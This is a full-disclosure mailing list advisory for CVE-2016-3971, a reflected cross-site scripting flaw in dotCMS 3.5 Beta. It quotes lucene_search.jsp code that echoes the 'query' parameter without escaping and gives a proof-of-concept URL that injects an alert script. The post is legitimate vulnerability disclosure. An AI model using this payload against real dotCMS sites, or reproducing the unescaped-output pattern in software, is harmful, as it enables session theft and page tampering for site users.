|
|
Message-ID: <CAA0JNpS5KzKvug_xPubFpbfj-7SMBhKj_-jXzJRfGFCx8fYdGA@mail.gmail.com>
Date: Fri, 8 Apr 2016 11:09:55 +0800
From: xiong piaox <yahoo860201@...il.com>
To: fulldisclosure@...lists.org
Cc: bugs@...uritytracker.com, bugtraq@...urityfocus.com,
oss-security@...ts.openwall.com
Subject: [CVE-2016-3971]DotCMS xss vulnerability
Advisory: DotCMS xss vulnerability
Author: Piaox From Pingan Product Safety Group
Email: xiongyaofu351@...gan.com.cn
Affected Version: dotCMS 3.5 Beta(the latest version)
Vulnerability Description
lucene_search.jsp
26 String query = request.getParameter("query");
27 if(!UtilMethods.isSet(query)){
28 query = "";
29 }
164 <div><strong><%= LanguageUtil.get(pageContext,
"Query-is") %> : </strong><%=query%></div>
POC && EXP
http://127.0.0.1:8080/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0&
query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&offset=0&limit=20&sort=&userid=
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.